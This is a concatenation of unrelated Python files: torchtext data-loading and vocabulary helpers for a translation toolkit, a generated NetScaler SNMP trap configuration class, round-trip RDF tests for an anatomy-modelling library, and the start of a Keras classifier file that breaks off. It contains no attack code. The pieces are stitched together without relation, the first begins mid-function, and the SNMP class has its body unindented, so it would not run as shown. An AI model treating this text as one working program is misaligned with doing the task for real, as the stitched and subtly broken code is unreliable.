    fields["alignment"] = torchtext.data.Field(
        use_vocab=False, tensor_type=torch.LongTensor,
        postprocessing=make_tgt, sequential=False)

    # Example indices; used to restore the original corpus order after batching.
    fields["indices"] = torchtext.data.Field(
        use_vocab=False, tensor_type=torch.LongTensor,
        sequential=False)

    return fields
def load_fields_from_vocab(vocab, data_type="text"):
    """
    Load Field objects from `vocab.pt` file.
    """
    vocab_dict = dict(vocab)
    n_src = len(collect_features(vocab_dict, 'src'))
    n_tgt = len(collect_features(vocab_dict, 'tgt'))
    fields = get_fields(data_type, n_src, n_tgt)
    for name, voc in vocab_dict.items():
        # Restore the unknown-word fallback that was stripped for pickling
        # (a defaultdict's lambda factory cannot be pickled).
        voc.stoi = defaultdict(lambda: 0, voc.stoi)
        fields[name].vocab = voc
    return fields
def save_fields_to_vocab(fields):
    """
    Extract picklable (name, vocab) pairs from Field objects for `vocab.pt`.
    """
    pairs = []
    for name, field in fields.items():
        if 'vocab' not in field.__dict__:
            continue
        # Demote to a plain dict: a defaultdict's lambda cannot be pickled.
        field.vocab.stoi = dict(field.vocab.stoi)
        pairs.append((name, field.vocab))
    return pairs
def merge_vocabs(vocabs, vocab_size=None):
    """
    Merge individual vocabularies (assumed to be generated from disjoint
    documents) into a larger vocabulary.

    Args:
        vocabs: `torchtext.vocab.Vocab` vocabularies to be merged
        vocab_size: `int` the final vocabulary size. `None` for no limit.
    Return:
        `torchtext.vocab.Vocab`
    """
    combined_freqs = Counter()
    for voc in vocabs:
        combined_freqs = combined_freqs + voc.freqs
    return torchtext.vocab.Vocab(
        combined_freqs,
        specials=[PAD_WORD, BOS_WORD, EOS_WORD],
        max_size=vocab_size)
def make_features(batch, side, data_type='text'):
    """
    Args:
        batch (Variable): a batch of source or target data.
        side (str): for source or for target.
        data_type (str): type of the source input. Options are [text|img].
    Returns:
        A sequence of src/tgt tensors with optional feature tensors
        of size (len x batch).
    """
    assert side in ['src', 'tgt']
    # The field may be a (data, lengths) tuple (include_lengths=True on src).
    if isinstance(batch.__dict__[side], tuple):
        data = batch.__dict__[side][0]
    else:
        data = batch.__dict__[side]

    feat_start = side + "_feat_"
    # Fix: sort feature keys by their numeric suffix. The previous plain
    # lexicographic sort ordered "..._feat_10" before "..._feat_2", shuffling
    # feature columns when 10+ features are present. Keys are generated as
    # side + "_feat_" + str(j) (see get_fields), so the suffix is numeric.
    keys = sorted(
        (k for k in batch.__dict__ if k.startswith(feat_start)),
        key=lambda k: int(k[len(feat_start):]))
    features = [batch.__dict__[k] for k in keys]
    levels = [data] + features

    if data_type == 'text':
        # Stack word indices with their feature indices along a new dim 2.
        return torch.cat([level.unsqueeze(2) for level in levels], 2)
    else:
        # img/audio sources carry no features; return the raw tensor.
        return levels[0]
def extract_features(tokens):
    """
    Split feature-annotated tokens into words and per-feature sequences.

    Each token is a word optionally followed by "\uffe8"-delimited features.

    Returns:
        (words, features, n_feats): the word sequence, a list of feature
        sequences, and the number of features per word (-1 for empty input).
    """
    if not tokens:
        return [], [], -1

    parts = [tok.split("\uffe8") for tok in tokens]
    # Drop tokens whose word component is empty.
    parts = [p for p in parts if p[0]]

    width = len(parts[0])
    assert all(len(p) == width for p in parts), \
        "all words must have the same number of features"

    columns = list(zip(*parts))
    return columns[0], columns[1:], width - 1
def collect_features(fields, side="src"):
    """
    Collect the ordered list of feature field names present for `side`.
    """
    assert side in ["src", "tgt"]
    feats = []
    j = 0
    while True:
        key = side + "_feat_" + str(j)
        if key not in fields:
            return feats
        feats.append(key)
        j += 1
def collect_feature_vocabs(fields, side):
    """
    Collect the Vocab of each consecutive feature Field for `side`.
    """
    assert side in ['src', 'tgt']
    vocabs = []
    j = 0
    key = side + "_feat_" + str(j)
    while key in fields:
        vocabs.append(fields[key].vocab)
        j += 1
        key = side + "_feat_" + str(j)
    return vocabs
def build_dataset(fields, data_type, src_path, tgt_path, src_dir=None,
                  src_seq_length=0, tgt_seq_length=0,
                  src_seq_length_trunc=0, tgt_seq_length_trunc=0,
                  dynamic_dict=True, sample_rate=0,
                  window_size=0, window_stride=0, window=None,
                  normalize_audio=True, use_filter_pred=True):
    """
    Build a Text/Image/Audio dataset from corpus files.

    Args:
        fields: dict of Fields as produced by `get_fields`.
        data_type: 'text', 'img' or 'audio'.
        src_path, tgt_path: corpus file locations (tgt is always text).
        src_dir: directory holding source image/audio files.
        remaining args: length limits, truncation, copy-dict and audio
            windowing options forwarded to the dataset constructors.

    Returns:
        The constructed dataset.

    Raises:
        ValueError: if `data_type` is not one of 'text', 'img', 'audio'.
    """
    # Hide this import inside to avoid circular dependency problem.
    from onmt.io import TextDataset, ImageDataset, AudioDataset

    # Build src/tgt examples iterator from corpus files, also extract
    # number of features. For all data types, the tgt side corpus is
    # in form of text.
    src_examples_iter, num_src_feats = \
        _make_examples_nfeats_tpl(data_type, src_path, src_dir,
                                  src_seq_length_trunc, sample_rate,
                                  window_size, window_stride,
                                  window, normalize_audio)
    tgt_examples_iter, num_tgt_feats = \
        _make_text_examples_nfeats_tpl(tgt_path, tgt_seq_length_trunc, "tgt")

    if data_type == 'text':
        dataset = TextDataset(fields, src_examples_iter, tgt_examples_iter,
                              num_src_feats, num_tgt_feats,
                              src_seq_length=src_seq_length,
                              tgt_seq_length=tgt_seq_length,
                              dynamic_dict=dynamic_dict,
                              use_filter_pred=use_filter_pred)
    elif data_type == 'img':
        dataset = ImageDataset(fields, src_examples_iter, tgt_examples_iter,
                               num_src_feats, num_tgt_feats,
                               tgt_seq_length=tgt_seq_length,
                               use_filter_pred=use_filter_pred)
    elif data_type == 'audio':
        dataset = AudioDataset(fields, src_examples_iter, tgt_examples_iter,
                               num_src_feats, num_tgt_feats,
                               tgt_seq_length=tgt_seq_length,
                               sample_rate=sample_rate,
                               window_size=window_size,
                               window_stride=window_stride,
                               window=window,
                               normalize_audio=normalize_audio,
                               use_filter_pred=use_filter_pred)
    else:
        # Robustness fix: an unknown data_type previously raised an opaque
        # NameError on the return below; fail fast with a clear message.
        raise ValueError("unsupported data_type: %s" % data_type)

    return dataset
def build_vocab(train_datasets, data_type, share_vocab,
                src_vocab_size, src_words_min_frequency,
                tgt_vocab_size, tgt_words_min_frequency):
    """
    Args:
        train_datasets: a list of train dataset.
        data_type: "text", "img" or "audio"?
        share_vocab(bool): share source and target vocabulary?
        src_vocab_size(int): size of the source vocabulary.
        src_words_min_frequency(int): the minimum frequency needed to
                include a source word in the vocabulary.
        tgt_vocab_size(int): size of the target vocabulary.
        tgt_words_min_frequency(int): the minimum frequency needed to
                include a target word in the vocabulary.
    """
    # All datasets have same fields, get the first one is OK.
    fields = train_datasets[0].fields

    # Target side is always text, so its vocab is always built.
    fields["tgt"].build_vocab(*train_datasets, max_size=tgt_vocab_size,
                              min_freq=tgt_words_min_frequency)
    for j in range(train_datasets[0].n_tgt_feats):
        fields["tgt_feat_" + str(j)].build_vocab(*train_datasets)

    # img/audio sources have no tokens, hence no source vocabulary.
    if data_type == 'text':
        fields["src"].build_vocab(*train_datasets, max_size=src_vocab_size,
                                  min_freq=src_words_min_frequency)
        for j in range(train_datasets[0].n_src_feats):
            fields["src_feat_" + str(j)].build_vocab(*train_datasets)

        # Merge the input and output vocabularies.
        if share_vocab:
            # `tgt_vocab_size` is ignored when sharing vocabularies
            merged_vocab = merge_vocabs(
                [fields["src"].vocab, fields["tgt"].vocab],
                vocab_size=src_vocab_size)
            # Both sides point at the same Vocab object after merging.
            fields["src"].vocab = merged_vocab
            fields["tgt"].vocab = merged_vocab
def _join_dicts(*args):
    """
    Args:
        dictionaries with disjoint keys.

    Returns:
        a single dictionary that has the union of these keys.
    """
    merged = {}
    for d in args:
        merged.update(d)
    return merged
def _peek(seq):
    """
    Pop the first element of iterator `seq` and reattach it.

    Returns:
        (first_element, restored_iterator) — the restored iterator yields
        the same sequence as the original one.
    """
    head = next(seq)
    restored = chain([head], seq)
    return head, restored
def _construct_example_fromlist(data, fields):
    """Build a torchtext Example by assigning each (name, field) its value."""
    example = torchtext.data.Example()
    for (name, field), value in zip(fields, data):
        # A None field means the raw value is stored without preprocessing.
        processed = field.preprocess(value) if field is not None else value
        setattr(example, name, processed)
    return example
def _read_text_file(path, truncate, side):
    """
    Args:
        path: location of a src or tgt file.
        truncate: maximum sequence length (0 for unlimited).
        side: 'src' or 'tgt'.

    Yields:
        (example_dict, n_feats) pairs for each line.
    """
    with codecs.open(path, "r", "utf-8") as corpus_file:
        for line_index, raw_line in enumerate(corpus_file):
            tokens = raw_line.strip().split(' ')
            if truncate:
                tokens = tokens[:truncate]

            words, feats, n_feats = extract_features(tokens)

            example = {side: words, "indices": line_index}
            if feats:
                prefix = side + "_feat_"
                for j, f in enumerate(feats):
                    example[prefix + str(j)] = f
            yield example, n_feats
def _read_img_file(path, src_dir, side, truncate=None):
    """
    Args:
        path: location of a src file containing image paths.
        src_dir: location of source images.
        side: 'src' or 'tgt'.
        truncate: maximum img size ((0,0) or None for unlimited).

    Yields:
        a dictionary containing image data, path and index for each line.
    """
    assert (src_dir is not None) and os.path.exists(src_dir),\
        'src_dir must be a valid directory if data_type is img'

    # Lazy global imports: PIL/torchvision are only needed for image data.
    global Image, transforms
    from PIL import Image
    from torchvision import transforms

    with codecs.open(path, "r", "utf-8") as corpus_file:
        index = 0
        for line in corpus_file:
            filename = line.strip()
            img_path = os.path.join(src_dir, filename)
            if not os.path.exists(img_path):
                # Fix: fall back to the *stripped* path. The raw line keeps
                # its trailing newline, so the fallback could never match an
                # existing file.
                img_path = filename

            assert os.path.exists(img_path), \
                'img path %s not found' % (filename)

            img = transforms.ToTensor()(Image.open(img_path))
            # Skip images larger than the (height, width) limit.
            if truncate and truncate != (0, 0):
                if not (img.size(1) <= truncate[0]
                        and img.size(2) <= truncate[1]):
                    continue

            example_dict = {side: img,
                            side + '_path': filename,
                            'indices': index}
            index += 1
            yield example_dict
def _read_audio_file(path, src_dir, side, sample_rate, window_size,
                     window_stride, window, normalize_audio, truncate=None):
    """
    Args:
        path: location of a src file containing audio paths.
        src_dir: location of source audio files.
        side: 'src' or 'tgt'.
        sample_rate: expected sample rate of the audio files.
        window_size: window size for spectrogram in seconds.
        window_stride: window stride for spectrogram in seconds.
        window: window type for spectrogram generation.
        normalize_audio: subtract spectrogram by mean and divide by std or not.
        truncate: maximum audio length (0 or None for unlimited).

    Yields:
        a dictionary containing audio data for each line.
    """
    assert (src_dir is not None) and os.path.exists(src_dir),\
        "src_dir must be a valid directory if data_type is audio"

    # Lazy global imports: audio deps are only needed for audio data.
    global torchaudio, librosa, np
    import torchaudio
    import librosa
    import numpy as np

    with codecs.open(path, "r", "utf-8") as corpus_file:
        index = 0
        for line in corpus_file:
            filename = line.strip()
            audio_path = os.path.join(src_dir, filename)
            if not os.path.exists(audio_path):
                # Fix: use the stripped path; the raw line's trailing newline
                # made this fallback unusable.
                audio_path = filename

            assert os.path.exists(audio_path), \
                'audio path %s not found' % (filename)

            sound, found_rate = torchaudio.load(audio_path)
            if truncate and truncate > 0:
                if sound.size(0) > truncate:
                    continue

            # Fix: the loaded rate previously shadowed the `sample_rate`
            # parameter, turning this check into `sample_rate == sample_rate`
            # (always true). Compare the file's rate against the expected one.
            assert found_rate == sample_rate, \
                'Sample rate of %s != -sample_rate (%d vs %d)' \
                % (audio_path, found_rate, sample_rate)

            sound = sound.numpy()
            if len(sound.shape) > 1:
                if sound.shape[1] == 1:
                    sound = sound.squeeze()
                else:
                    sound = sound.mean(axis=1)  # average multiple channels

            n_fft = int(sample_rate * window_size)
            win_length = n_fft
            hop_length = int(sample_rate * window_stride)
            # STFT
            d = librosa.stft(sound, n_fft=n_fft, hop_length=hop_length,
                             win_length=win_length, window=window)
            spect, _ = librosa.magphase(d)
            spect = np.log1p(spect)
            spect = torch.FloatTensor(spect)
            if normalize_audio:
                mean = spect.mean()
                std = spect.std()
                spect.add_(-mean)
                spect.div_(std)

            example_dict = {side: spect,
                            side + '_path': filename,
                            'indices': index}
            index += 1
            yield example_dict
def _make_text_examples_nfeats_tpl(path, truncate, side):
    """
    Process the text corpus into (example_dict iterator, num_feats) tuple.
    """
    assert side in ['src', 'tgt']

    if path is None:
        return (None, 0)

    # Every line carries the same number of features, so peeking at the
    # first example is enough to learn num_feats.
    nfeats_iter = _read_text_file(path, truncate, side)
    (_, num_feats), nfeats_iter = _peek(nfeats_iter)
    examples_iter = (example for example, _ in nfeats_iter)
    return (examples_iter, num_feats)
def _make_examples_nfeats_tpl(data_type, src_path, src_dir,
                              src_seq_length_trunc, sample_rate,
                              window_size, window_stride,
                              window, normalize_audio):
    """
    Process the corpus into (example_dict iterator, num_feats) tuple
    on source side for different 'data_type'.

    Raises:
        ValueError: if `data_type` is not one of 'text', 'img', 'audio'.
    """
    if data_type == 'text':
        src_examples_iter, num_src_feats = _make_text_examples_nfeats_tpl(
            src_path, src_seq_length_trunc, "src")
    elif data_type == 'img':
        src_examples_iter = _read_img_file(src_path, src_dir, "src")
        num_src_feats = 0  # Source side(img) has no features.
    elif data_type == 'audio':
        src_examples_iter = _read_audio_file(src_path, src_dir, "src",
                                             sample_rate, window_size,
                                             window_stride, window,
                                             normalize_audio)
        num_src_feats = 0  # Source side(audio) has no features.
    else:
        # Robustness fix: an unknown data_type previously fell through and
        # raised NameError on the return below.
        raise ValueError("unsupported data_type: %s" % data_type)

    return src_examples_iter, num_src_feats
class OrderedIterator(torchtext.data.Iterator):
    """Iterator that keeps examples within each batch sorted by `sort_key`."""

    def create_batches(self):
        # Training: pool similarly-sized examples into shuffled batches,
        # presumably to reduce padding — see torchtext.data.pool.
        if self.train:
            self.batches = torchtext.data.pool(
                self.data(), self.batch_size,
                self.sort_key, self.batch_size_fn,
                random_shuffler=self.random_shuffler)
        else:
            # Evaluation: plain sequential batches, each sorted by sort_key.
            self.batches = []
            for b in torchtext.data.batch(self.data(), self.batch_size,
                                          self.batch_size_fn):
                self.batches.append(sorted(b, key=self.sort_key))
class ONMTDatasetBase(torchtext.data.Dataset):
    """
    A dataset basically supports iteration over all the examples
    it contains. We currently have 3 datasets inheriting this base
    for 3 types of corpus respectively: "text", "img", "audio".

    Internally it initializes an `torchtext.data.Dataset` object with
    the following attributes:

        `examples`: a sequence of `torchtext.data.Example` objects.
        `fields`: a dictionary associating str keys with Field objects. Does not
            necessarily have the same keys as the input fields.
    """

    def __init__(self, *args, **kwargs):
        # Subclasses implement _process_corpus to turn raw corpus data into
        # examples, fields and a filter predicate.
        examples, fields, filter_pred = self._process_corpus(*args, **kwargs)
        super(ONMTDatasetBase, self).__init__(
            examples, fields, filter_pred
        )

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, d):
        self.__dict__.update(d)

    def __reduce_ex__(self, proto):
        "This is a hack. Something is broken with torch pickle."
        # Bug fix: the protocol argument must be forwarded — calling
        # __reduce_ex__() with no argument raises TypeError.
        return super(ONMTDatasetBase, self).__reduce_ex__(proto)

    def collapse_copy_scores(self, scores, batch, tgt_vocab):
        """
        Given scores from an expanded dictionary
        corresponding to a batch, sums together copies,
        with a dictionary word when it is ambiguous.
        """
        offset = len(tgt_vocab)
        for b in range(batch.batch_size):
            index = batch.indices.data[b]
            src_vocab = self.src_vocabs[index]
            # Start at 1 to skip index 0; fold each copied source token's
            # score into the matching target-vocab entry when one exists.
            for i in range(1, len(src_vocab)):
                sw = src_vocab.itos[i]
                ti = tgt_vocab.stoi[sw]
                if ti != 0:
                    scores[:, b, ti] += scores[:, b, offset + i]
                    # Near-zero rather than exactly zero, presumably to keep
                    # downstream log() finite — confirm with callers.
                    scores[:, b, offset + i].fill_(1e-20)
        return scores

    @staticmethod
    def coalesce_datasets(datasets):
        """Coalesce all dataset instances. """
        final = datasets[0]
        for d in datasets[1:]:
            # `src_vocabs` is a list of `torchtext.vocab.Vocab`.
            # Each sentence transforms into on Vocab.
            # Coalesce them into one big list.
            final.src_vocabs += d.src_vocabs

            # All datasets have same number of features.
            aeq(final.n_src_feats, d.n_src_feats)
            aeq(final.n_tgt_feats, d.n_tgt_feats)

            # `examples` is a list of `torchtext.data.Example`.
            # Coalesce them into one big list.
            final.examples += d.examples

            # All datasets have same fields, no need to update.
        return final
|
#
# Copyright (c) 2008-2016 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class snmptrap(base_resource) :
""" Configuration for snmp trap resource. """
def __init__(self) :
    """Initialize an snmptrap configuration object with all fields unset."""
    self._trapclass = None
    self._trapdestination = None
    self._version = None
    self._td = None
    self._destport = None
    self._communityname = None
    self._srcip = None
    self._severity = None
    self._allpartitions = None
    # Presumably holds the resource count returned by count queries — the
    # triple-underscore name follows the generated NITRO SDK pattern.
    self.___count = None
@property
def trapclass(self):
    r"""Trap message type sent to the listener.<br/>Possible values = generic, specific."""
    return self._trapclass

@trapclass.setter
def trapclass(self, trapclass):
    r"""Set the trap message type (generic or specific)."""
    self._trapclass = trapclass

@property
def trapdestination(self):
    r"""IPv4 or IPv6 address of the trap listener.<br/>Minimum length = 1."""
    return self._trapdestination

@trapdestination.setter
def trapdestination(self, trapdestination):
    r"""Set the trap listener address."""
    self._trapdestination = trapdestination

@property
def version(self):
    r"""SNMP version used for trap messages; must match the listener's setting.<br/>Default value: V2<br/>Possible values = V1, V2, V3."""
    return self._version

@version.setter
def version(self, version):
    r"""Set the SNMP version (V1, V2 or V3)."""
    self._version = version

@property
def td(self):
    r"""Traffic domain id of the entity (default domain 0 when unset).<br/>Maximum length = 4094."""
    return self._td

@td.setter
def td(self, td):
    r"""Set the traffic domain id."""
    self._td = td

@property
def destport(self):
    r"""UDP port the trap listener listens on; must match the listener's setting.<br/>Default value: 162<br/>Minimum length = 1<br/>Maximum length = 65534."""
    return self._destport

@destport.setter
def destport(self, destport):
    r"""Set the trap listener UDP port."""
    self._destport = destport

@property
def communityname(self):
    r"""Community string sent with trap messages so the listener can authenticate them; must match the listener's configuration."""
    return self._communityname

@communityname.setter
def communityname(self, communityname):
    r"""Set the SNMP community string."""
    self._communityname = communityname

@property
def srcip(self):
    r"""Source IP inserted in trap messages (defaults to the appliance NSIP/NSIP6).<br/>Minimum length = 1."""
    return self._srcip

@srcip.setter
def srcip(self, srcip):
    r"""Set the source IP for trap messages."""
    self._srcip = srcip

@property
def severity(self):
    r"""Minimum severity of traps sent to this listener (SPECIFIC trap class only).<br/>Default value: Unknown<br/>Possible values = Critical, Major, Minor, Warning, Informational."""
    return self._severity

@severity.setter
def severity(self, severity):
    r"""Set the minimum trap severity."""
    self._severity = severity

@property
def allpartitions(self):
    r"""Send traps of all partitions to this destination.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED."""
    return self._allpartitions

@allpartitions.setter
def allpartitions(self, allpartitions):
    r"""Enable or disable sending traps of all partitions."""
    self._allpartitions = allpartitions
def _get_nitro_response(self, service, response) :
    r""" converts nitro response into object and returns the object array in case of get request.
    """
    try :
        result = service.payload_formatter.string_to_resource(snmptrap_response, response, self.__class__.__name__)
        if(result.errorcode != 0) :
            # Errorcode 444 means the session expired; drop it so the
            # client re-authenticates on the next request.
            if (result.errorcode == 444) :
                service.clear_session(self)
            if result.severity :
                # Only severity "ERROR" is fatal; lesser severities
                # (e.g. warnings) fall through and still return the result.
                if (result.severity == "ERROR") :
                    raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
            else :
                # No severity supplied: treat any non-zero errorcode as fatal.
                raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
        return result.snmptrap
    except Exception as e :
        raise e
def _get_object_name(self) :
    r"""Return the object identifier for this resource.

    The trap class doubles as the identifier; ``None`` is returned when it
    has not been set.
    """
    trap_class = self.trapclass
    return None if trap_class is None else str(trap_class)
@classmethod
def add(cls, client, resource) :
    r""" Use this API to add snmptrap.

    `resource` may be a single snmptrap-like object or a list of them; the
    writable fields are copied onto fresh snmptrap instances before the
    add request (single or bulk) is issued.
    """
    try :
        # Fields forwarded to the NITRO add call, in the generated order.
        copied_attrs = ("trapclass", "trapdestination", "version", "td",
                        "destport", "communityname", "srcip", "severity",
                        "allpartitions")
        if type(resource) is not list :
            addresource = snmptrap()
            for attr in copied_attrs :
                setattr(addresource, attr, getattr(resource, attr))
            return addresource.add_resource(client)
        else :
            if (resource and len(resource) > 0) :
                addresources = []
                for item in resource :
                    fresh = snmptrap()
                    for attr in copied_attrs :
                        setattr(fresh, attr, getattr(item, attr))
                    addresources.append(fresh)
                result = cls.add_bulk_request(client, addresources)
            return result
    except Exception as e :
        raise e
@classmethod
def delete(cls, client, resource) :
    r""" Use this API to delete snmptrap.
    """
    try :
        if type(resource) is not list :
            deleteresource = snmptrap()
            if type(resource) != type(deleteresource):
                # Caller passed a bare trap-class value instead of an object.
                deleteresource.trapclass = resource
            else :
                # Caller passed a populated snmptrap; copy identifying fields.
                deleteresource.trapclass = resource.trapclass
                deleteresource.trapdestination = resource.trapdestination
                deleteresource.version = resource.version
                deleteresource.td = resource.td
            return deleteresource.delete_resource(client)
        else :
            if type(resource[0]) != cls :
                # List of bare trap-class values.
                if (resource and len(resource) > 0) :
                    deleteresources = [ snmptrap() for _ in range(len(resource))]
                    for i in range(len(resource)) :
                        deleteresources[i].trapclass = resource[i]
            else :
                # List of populated snmptrap objects.
                if (resource and len(resource) > 0) :
                    deleteresources = [ snmptrap() for _ in range(len(resource))]
                    for i in range(len(resource)) :
                        deleteresources[i].trapclass = resource[i].trapclass
                        deleteresources[i].trapdestination = resource[i].trapdestination
                        deleteresources[i].version = resource[i].version
                        deleteresources[i].td = resource[i].td
            # NOTE(review): an empty list leaves `deleteresources` unbound and
            # the next line raises NameError (re-raised below) — confirm this
            # matches the generated SDK's intent.
            result = cls.delete_bulk_request(client, deleteresources)
            return result
    except Exception as e :
        raise e
@classmethod
def update(cls, client, resource) :
    r""" Use this API to update snmptrap.

    Mirrors :meth:`add`: accepts one snmptrap-like object or a list, copies
    the writable fields onto fresh snmptrap instances, and issues a single
    or bulk update request.
    """
    try :
        copied_attrs = ("trapclass", "trapdestination", "version", "td",
                        "destport", "communityname", "srcip", "severity",
                        "allpartitions")
        if type(resource) is not list :
            updateresource = snmptrap()
            for attr in copied_attrs :
                setattr(updateresource, attr, getattr(resource, attr))
            return updateresource.update_resource(client)
        else :
            if (resource and len(resource) > 0) :
                updateresources = []
                for item in resource :
                    fresh = snmptrap()
                    for attr in copied_attrs :
                        setattr(fresh, attr, getattr(item, attr))
                    updateresources.append(fresh)
                result = cls.update_bulk_request(client, updateresources)
            return result
    except Exception as e :
        raise e
@classmethod
def unset(cls, client, resource, args) :
    r""" Use this API to unset the properties of snmptrap resource.
    Properties that need to be unset are specified in args array.
    """
    try :
        if type(resource) is not list :
            unsetresource = snmptrap()
            # Copy identifying fields; `args` names the properties to clear.
            unsetresource.trapclass = resource.trapclass
            unsetresource.trapdestination = resource.trapdestination
            unsetresource.version = resource.version
            unsetresource.td = resource.td
            return unsetresource.unset_resource(client, args)
        else :
            if type(resource[0]) == cls :
                if (resource and len(resource) > 0) :
                    unsetresources = [ snmptrap() for _ in range(len(resource))]
                    for i in range(len(resource)) :
                        unsetresources[i].trapclass = resource[i].trapclass
                        unsetresources[i].trapdestination = resource[i].trapdestination
                        unsetresources[i].version = resource[i].version
                        unsetresources[i].td = resource[i].td
            # NOTE(review): if the list items are not snmptrap instances (or
            # the list is empty), `unsetresources` is never bound and the call
            # below raises NameError (re-raised by the except clause).
            result = cls.unset_bulk_request(client, unsetresources, args)
            return result
    except Exception as e :
        raise e
@classmethod
def get(cls, client, name="", option_="") :
    r""" Use this API to fetch all the snmptrap resources that are configured on netscaler.
    """
    try :
        if not name :
            # No name given: fetch every configured snmptrap resource.
            obj = snmptrap()
            response = obj.get_resources(client, option_)
        else :
            if type(name) == cls :
                if type(name) is not list :
                    # NOTE(review): the caller-supplied `option_` parameter is
                    # rebound here to a fresh options() object, silently
                    # discarding any passed-in value — generated-SDK pattern.
                    option_ = options()
                    option_.args = nitro_util.object_to_string_withoutquotes(name)
                    response = name.get_resource(client, option_)
                else :
                    # NOTE(review): unreachable — `type(name) == cls` already
                    # excludes lists; kept verbatim from the generated code.
                    if name and len(name) > 0 :
                        response = [snmptrap() for _ in range(len(name))]
                        for i in range(len(name)) :
                            option_ = options()
                            option_.args = nitro_util.object_to_string_withoutquotes(name[i])
                            response[i] = name[i].get_resource(client, option_)
        return response
    except Exception as e :
        raise e
@classmethod
def get_filtered(cls, client, filter_) :
    r""" Use this API to fetch filtered set of snmptrap resources.
    filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
    """
    try :
        fetch_option = options()
        fetch_option.filter = filter_
        return snmptrap().getfiltered(client, fetch_option)
    except Exception as e :
        raise e
@classmethod
def count(cls, client) :
    r""" Use this API to count the snmptrap resources configured on NetScaler.
    """
    try :
        count_option = options()
        count_option.count = True
        resources = snmptrap().get_resources(client, count_option)
        if not resources :
            return 0
        # The count comes back in a mangled private attribute on the first
        # resource, so it is read via __dict__.
        return resources[0].__dict__['___count']
    except Exception as e :
        raise e
@classmethod
def count_filtered(cls, client, filter_) :
    r""" Use this API to count filtered the set of snmptrap resources.
    Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
    """
    try :
        count_option = options()
        count_option.count = True
        count_option.filter = filter_
        resources = snmptrap().getfiltered(client, count_option)
        if not resources :
            return 0
        # Same mangled-attribute access as in count().
        return resources[0].__dict__['___count']
    except Exception as e :
        raise e
class Allpartitions:
    # Allowed values for the `allpartitions` attribute.
    ENABLED = "ENABLED"
    DISABLED = "DISABLED"
class Trapclass:
    # Allowed values for the `trapclass` attribute.
    generic = "generic"
    specific = "specific"
class Severity:
    # Allowed values for the `severity` attribute, from most to least severe.
    Critical = "Critical"
    Major = "Major"
    Minor = "Minor"
    Warning = "Warning"
    Informational = "Informational"
class Version:
    # Allowed SNMP protocol versions for the `version` attribute.
    V1 = "V1"
    V2 = "V2"
    V3 = "V3"
class snmptrap_response(base_response) :
    """Response wrapper deserialized from a NITRO snmptrap API reply.

    Carries the standard NITRO status fields plus the array of snmptrap
    resources returned by a GET request.
    """
    def __init__(self, length=1) :
        self.errorcode = 0
        self.message = ""
        self.severity = ""
        self.sessionid = ""
        # Pre-allocate one resource object per expected record. (The original
        # generated code also assigned `self.snmptrap = []` first, which was
        # immediately overwritten here — the dead assignment is removed.)
        self.snmptrap = [snmptrap() for _ in range(length)]
|
import json
import unittest
from pathlib import Path
from sparcur import apinat
import pytest
export = False
debug = False
class TestApiNATToRDF(unittest.TestCase):
    """Round-trip each ApiNATomy JSON fixture through RDF and back.

    Each numbered test loads a map file and a generated/model file, builds
    an :class:`apinat.Graph`, converts it to RDF, reconstructs the map from
    the RDF, and sanity-checks both representations. The module-level
    ``export`` and ``debug`` flags optionally write a ttl file / dump debug
    output (``debug`` deliberately ends with ``assert False`` so the output
    is visible in the pytest failure report).
    """

    def _roundtrip(self, map_name, gen_name, ttl_name):
        """Shared body of the numbered tests; see class docstring."""
        data_dir = Path(__file__).parent / 'apinatomy/data'
        with open(data_dir / map_name, 'rt') as f:
            m = json.load(f)
        with open(data_dir / gen_name, 'rt') as f:
            g = json.load(f)
        apin = apinat.Graph(m, g)
        rdfg = apin.graph()
        rtmap = apinat.Graph.fromRdf(rdfg).map
        assert list(rdfg)
        assert rtmap['resources']
        if export:
            rdfg.write(Path(ttl_name))
        if debug:
            print(rdfg.ttl)
            print(rtmap)
            assert False

    def test_1(self):
        self._roundtrip('test_1_map.json', 'test_1_generated.json', 'test-1.ttl')

    def test_2(self):
        self._roundtrip('test_2_map.json', 'test_2_generated.json', 'test-2.ttl')

    def test_3(self):
        self._roundtrip('test_3_map.json', 'test_3_generated.json', 'test-3.ttl')

    def test_4(self):
        self._roundtrip('test_4_map.json', 'test_4_generated.json', 'test-4.ttl')

    def test_5(self):
        # FIXME generated is broken at the moment, so use the model file.
        self._roundtrip('test_5_map.json', 'test_5_model.json', 'test-5.ttl')

    # The original line here was the corrupted placeholder
    # "<EMAIL>('not ready')" — restored to the intended pytest skip marker.
    @pytest.mark.skip('not ready')
    def test_bolew(self):
        data_dir = Path(__file__).parent / 'apinatomy/data'
        with open(data_dir / 'bolser-lewis-map.json', 'rt') as f:
            m = json.load(f)
        #m = {'id':'null', 'resources':{}}
        with open(data_dir / 'bolser-lewis-generated.json', 'rt') as f:
            g = json.load(f)
        apin = apinat.Graph(m, g)
        rdfg = apin.graph()
        rtmap = apinat.Graph.fromRdf(rdfg).map
        if export:
            rdfg.write(Path('test-bolew.ttl'))
        if debug:
            print(rdfg.ttl)
            print(rtmap)
            assert False
class TestRDFToOWL2(unittest.TestCase):
    """Placeholder for RDF -> OWL2 conversion tests (not yet implemented)."""
    pass
|
# multi_label/multi_label_model.py
# -*- coding: utf-8 -*-
"""
File multi_label_model.py
@author:ZhengYuwei
"""
import logging
from tensorflow import keras
from backbone.resnet18 import ResNet18
from backbone.resnet18_v2 import ResNet18_v2
from backbone.resnext import ResNeXt18
from backbone.mixnet18 import MixNet18
from backbone.mobilenet_v2 import MobileNetV2
class Classifier(object):
    """
    Classifier with a custom multi-label head: a keras.models.Model with one
